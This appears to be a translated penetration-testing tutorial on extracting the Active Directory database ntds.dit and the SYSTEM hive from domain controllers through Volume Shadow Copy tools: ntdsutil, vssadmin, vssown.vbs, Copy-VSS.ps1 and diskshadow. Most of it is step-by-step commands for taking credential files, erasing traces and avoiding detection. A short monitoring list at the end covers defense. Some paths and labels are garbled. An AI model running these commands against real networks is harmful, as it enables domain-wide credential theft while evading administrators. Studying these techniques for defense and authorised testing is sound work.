Five tips for using Volume Shadow Copy Service to attack domain controllers

Click the star toreceive the latest tweets instantly

In Microsoft Active Directory (Active Directory), all data is saved in ntds.dit. NTDS.DIT is a binary file.

It exists on the domain controller

%SystemRoot%\
tds\
TDS.DIT. ntds.dit includes but is not limited to Username, Hash, Group, GPP, OU and other Active Directory related information. Like the SAM file, it is locked by the Windows system. Let’s introduce how to export ntds.dit from the system and how to read the information in ntds.dit. Under normal circumstances, we will use VSS, which is Volume Shadow Copy Service. VSS is essentially a type of snapshot technology, mainly used for backup and recovery (even if the target file is currently locked).

ntdsutil tool extraction

ntdsutil.exe is a command line tool that provides management facilities for Active Directory. You can use Ntdsutil.exe to perform database maintenance for Active Directory, manage and control individual host operations, create application directory partitions, and remove metadata left by a domain controller that was successfully demoted without using the Active Directory Setup Wizard (DCPromo.exe). data. This tool is installed on the domain controller by default. We can operate it on the domain controller, or remotely operate it on the domain controller through a machine in the domain. How to perform remote operations will be explained in detail in the following chapters.

Supported operating systems are: Server 2003, Server 2008, Server 2012.

First, we enter the following command in cmd on the domain controller to create a snapshot. This snapshot copies and pastes all the files in Windows. The copied files are not subject to Windows lock restrictions. You can see that a snapshot copy with the GUID b899b565-dcd4-423a-b663-7dfabbfb979e is created, as shown in Figure 6-1.

ntdsutil snapshot "activate instance ntds" create quit quit

Figure 6-1 Using ntdsutil.exe to create a snapshot

Next, we mount the snapshot we just created on the machine. The command format is ntdsutil snapshot “mount {GUID}” quit quit, where GUID is the GUID we just created.

Enter the following command in cmd to mount. You can see that the snapshot has been successfully mounted to the system. The snapshot is mounted in the C:\$SNAP_201808131112_VOLUMEC$\ directory, as shown in Figure 6-2.

ntdsutil snapshot "mount {b899b565-dcd4-423a-b663-7dfabbfb979e}" quit quit

Figure 6-2 Mount the created snapshot into the system

Then use the copy command that comes with Windows to copy the files in the snapshot, and enter the following command in cmd.

copy C:\$SNAP_201808131112_VOLUMEC$\windows\
tds\
tds.dit c:\temp\
tds.dit

This command can convert the snapshot into

C:\$SNAP_201808131112_VOLUMEC$\windows\
tds\
tds.dit

Copy to the c:\temp\
tds.dit directory on your local computer.

Next, we unmount the previously mounted snapshot, delete the snapshot, and erase traces. As shown in Figure 6-3, enter the command in cmd:

ntdsutil snapshot "unmount {b899b565-dcd4-423a-b663-7dfabbfb979e}" "delete {b899b565-dcd4-423a-b663-7dfabbfb979e}" quit quit

Figure 6-3 Unmount and delete the mounted snapshot

Among them, b899b565-dcd4-423a-b663-7dfabbfb979e is the GUID when it was created before, and the GUID is different every time it is created. Then query all current snapshots and it shows that there are no snapshots, indicating that the deletion is successful, as shown in Figure 6-4.

Figure 6-4 lists all snapshots in the current system

vssadmin tool extraction

vssadminn is a VSS management tool provided by Windows Server 2008 and Windows 7 systems. It can be used to create or delete shadow copies and list shadow copy information (only shadow copies created by the system provider can be managed). It can also be used to display all installed volume shadow copy writers and providers (providers), as well as change the size of the shadow copy storage space (the so-called “diff space”), etc.

Supported operating systems: Server 2008, Server 2012

The operation process is similar to ntdsutil. Open cmd on the domain controller and enter the following command to create a shadow copy of the C drive, as shown in Figure 6-5.

vssadmin create shadow /for=c:

Figure 6-5 Creating a snapshot

Copy the ntds.dit in the created copy, as shown in Figure 6-6, enter the command in cmd:

copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\
TDS\
tds.dit c:\
tds.dit

Figure 6-6 Copy ntds.dit in the snapshot

Check the C drive and see that ntds.dit has been successfully copied, as shown in Figure 6-7.

Figure 6-7 Check whether the copy is successful

The next thing to do is to delete the copy and clean up the traces, as shown in Figure 6-8.

Figure 6-8 Deleting snapshots

vssown.vbs script extraction

vssown.vbs is similar to vssadmin. It was developed by Tim Tomes. It can create and delete volume shadow copies, as well as start and stop the volume shadow copy service. The author’s github stores this project, download address:

https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

Execute the script under cmd. The following commands are commonly used in this script.

cscript vssown.vbs /start /Start the Volume Shadow Copy Service

cscript vssown.vbs /create c /Create a shadow copy of the C drive

cscript vssown.vbs /list /List current shadow copies

cscript vssown.vbs /delete /Delete shadow copy

First start the Volume Shadow Copy service, as shown in Figure 6-9, enter the command:

cscript vssown.vbs /start

Figure 6-9 Starting the Volume Shadow Copy Service

Create a shadow copy of the C drive, as shown in Figure 6-10. Enter the command:

cscript vssown.vbs /create c

Figure 6-10 Creating a snapshot

List the current shadow copies, as shown in Figure 6-11, enter the command:

cscript vssown.vbs /list

It is seen that there is currently a shadow copy with the ID {E6ED51DF-7EC8-43F5-84D0-077899E7D4C9}. The shadow copy location is

\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8

Figure 6-11 View currently existing snapshots

Copy ntds.dit and the copy is successful. As shown in Figure 6-12, enter the command:

copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\
TDS\
tds.dit c:\
tds.dit

Figure 6-12 Copy ntds.dit to local disk

Delete the shadow copy and erase traces, as shown in Figure 5-166, enter the command:

cscript vssown.vbs /delete {E6ED51DF-7EC8-43F5-84D0-077899E7D4C9}

Figure 6-13 Deleting the created snapshot

Create shadow copies using NTDSUTIL’s IFM

You can follow the four steps of creating, mounting, copying, and deleting the commands in method (1) to complete the copy of ntds.dit. You can also use the method of creating an IFM to obtain the ntds.dit database file. When we use NTDSUTIL to create an IFM , the shadow copy will take a snapshot, mount, and copy ntds.dit and computer SAM to the target folder. This method can also be executed remotely using Powershell or WMI, which we will introduce one by one in the following chapters.

First, we open cmd in administrator mode on the domain controller, as shown in Figure 6-14, and enter the following command.

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

Figure 6-14 Create a snapshot and copy ntds.dit to the local disk

This command will copy ntds.dit to the Active Directory folder in the test folder under the C drive, as shown in Figure 6-15.

Figure 6-15 View ntds.dit exported to the local disk

Copy SYSTEM and SECURITY to the registry folder in the test folder under the C drive, as shown in Figure 6-16.

Figure 6-16 View the SYSTEM exported to the local disk

After dragging ntds.dit back to the local machine, delete the entire test folder on the target machine and enter the command:

rmdir /s/q test

Tips: Use Powershell to export ntds.dit

The nishang toolkit mentioned earlier contains a powershell script named Copy-VSS.ps1. We extract the script separately, open a Powershell window on the domain controller, import Copy-VSS.ps1 and execute it. Script, as shown in Figure 6-17, enter the command:

import-module .\Copy-VSS.ps1 /Import the script
Copy-vss /Execute command

Figure 6-17 Export ntds.dit using Powershell

This script will copy SAM, SYSTEM, and ntds.dit to the same directory as Copy-VSS.ps1, and we can drag them back to the local for processing.

Export ntds.dit using diskshadow

Refer to Microsoft’s official documentation to explain: “DiskShadow.exe is a tool that can use multiple functions provided by Volume Shadow Copy Service (VSS). In the default configuration, DiskShadow.exe uses an interactive command interpreter, which is similar to DiskRaid or DiskPart is similar.” In fact, because DiskShadow’s code is officially signed by Microsoft, and DiskShadow is included by default in Windows Server 2008, Windows Server 2012 and Windows Server 2016. Diskshadow.exe can also be used to operate VSS to export ntds.dit. Its function is similar to vshadow. It is also placed in the c:\windows\system32\ directory, while vshdow is included in the windowsSDK. In actual combat You may also need to find a way to transfer it to the target machine yourself. In other words, diskshadow is more convenient to use out of the box on the target system during our actual penetration process. Diskshadow has two types: interactive mode and non-interactive mode. The interactive mode requires graphical management such as logging in to the remote desktop, and does not use covert penetration, so we generally use the non-interactive mode to operate. Because whether in interactive mode or non-interactive mode, you can use EXEC to execute related commands by calling a script file.

First, check the help information of diskshadow.exe, list all options, and enter the command, as shown in Figure 6-18.

diskshadow.exe /?

Figure 6-18 View the help information of diskshadow.exe

We can use diskshadow.exe to execute commands. This operation can bypass some protection programs. For example, we can use diskshadow.exe to run a calc.exe as a verification. Enter the command to be executed into a text file. First, exec c: \windows\system32\calc.exe writes command.txt in the C drive directory, as shown in Figure 6-19.

Figure 6-19 View the content in the script file

Then use diskshadow.exe to execute the command and enter the command, as shown in Figure 6-20.

Figure 6-20 uses diskshadow.exe to run a calc.exe

diskshadow.exe can also be used to export ntds.dit. We need to write the command into a text file with the following content:

set context persistent nowriters /Set volume shadow copies
add volume c: alias someAlias /Add a new volume
create/Create a new snapshot
expose %someAlias% k: /Assign virtual disk drive letter
exec "cmd.exe" /c copy k:\Windows\
TDS\
tds.dit c:\
tds.dit /Copy ntds.dit to C drive
delete shadows all/Delete all snapshots
list shadows all/List shadow copies of the system
reset /reset
exit /33Exit

Use diskshadow.exe to directly load this text file to execute the command. Enter the command, as shown in Figure 6-21.

diskshadow /s c:\command.txt

Figure 6-21 Execute script to export ntds.dit

Note: When using diskshadow.exe to export ntds.dit, you must switch the path of the current domain controller’s execution shell to C:\windows\system32\, otherwise an error will occur, and then use diskshadow.exe to load this command. txt can be executed.

The effect of creating a snapshot and assigning a drive letter is shown in Figure 6-22.

Figure 6-22 Creating a virtual disk with a drive letter assigned

After exporting ntds.dit, we can use it. We also need to dump the system because the key to decrypt ntds.dit is stored in the system. Without this key, we cannot view the information in ntds.dit. Enter the command, As shown in Figure 6-23.

reg save hklm\system c:\windows\temp\system.hive

Figure 6-23 Export SYSTEM from the registry

Note: When using diskshadow.exe to export ntds.dit, remember to delete the snapshot and the assigned drive letter after the export is successful to alert the administrator and avoid unnecessary trouble.

Summary

1. In a practical environment, we can use some functions of diskshadow.exe in unprivileged user rights. Compared with other tools of Vshadow, diskshadow.exe is more flexible.

2. When diskshadow.exe executes a command, it needs to upload a text file to the local disk of the target operating system or complete it interactively. However, tools such as Vshadow can directly execute relevant commands when encountering operations with stricter security restrictions. Used in the system, it can greatly reduce the possibility of being discovered.

3. In actual combat, first write the text file containing the commands that need to be executed to the remote target operating system, and then use diskshadow.exe to call the text file and execute it.

4. Use diskshadow.exe to export ntds.dit. You can use wmi to operate the remote host to avoid graphical login.

5. When using diskshadow.exe to export ntds.dit, be sure to perform the operation in C:\windows\system32\.

6. After the script execution is completed, check the size of ntds.dit copied from the snapshot. If an error occurs, you can check and modify the script and execute it again.

Defense:

1. Monitor the use of Volume Shadow Copy Service (VSS), detect volume shadow copy activities and any suspicious operations involving the Active Directory database file (ntds.dit).

2. Monitor suspicious instances of System Event ID 7036 (a sign that the Volume Shadow Copy Service has entered a running state) and the creation event of the VSSVC.exe process.

3. Monitor the process creation events of diskshadow.exe and related child processes.

4. Monitor the creation of diskshadow.exe instances on client devices. Unless it is a business requirement, diskshadow.exe should not appear in the Windows operating system and can be deleted from the computer.

5. Monitor the logs for new logical drive mapping events.